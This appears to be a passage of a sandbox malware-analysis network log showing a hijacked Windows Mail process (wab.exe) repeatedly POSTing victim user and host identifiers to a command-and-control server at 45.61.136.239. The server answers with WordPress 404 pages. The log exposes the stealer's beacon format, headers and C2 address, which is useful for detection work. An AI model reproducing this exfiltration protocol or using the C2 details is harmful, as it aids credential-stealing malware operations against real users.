                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:42:37.323261976 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:37.323276997 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:37.323292971 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:37.323404074 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
                  Jul 3, 2024 09:42:37.323420048 CEST1236INData Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d
                  Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.74971945.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:37.481024027 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:37.486402035 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:40.269757986 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:37 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:40.269789934 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:40.269805908 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:40.269820929 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:42:40.269838095 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:42:40.269875050 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:40.269893885 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:40.269912004 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:40.270004034 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
                  Jul 3, 2024 09:42:40.270019054 CEST224INData Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d
                  Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.74972045.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:40.474009991 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:40.478893995 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:44.028515100 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:40 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:44.028537989 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:42:44.028554916 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:42:44.028564930 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:42:44.028578043 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:42:44.028640985 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
                  Jul 3, 2024 09:42:44.028656006 CEST1236INData Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b
                  Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
                  Jul 3, 2024 09:42:44.028667927 CEST448INData Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30
                  Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
                  Jul 3, 2024 09:42:44.028760910 CEST1236INData Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68
                  Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
                  Jul 3, 2024 09:42:44.028819084 CEST1236INData Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d
                  Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.74972145.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:42:44.173589945 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 165
                  Connection: close
                  Jul 3, 2024 09:42:44.178575993 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: (ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                  Jul 3, 2024 09:42:48.494966030 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:42:44 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:42:48.495048046 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
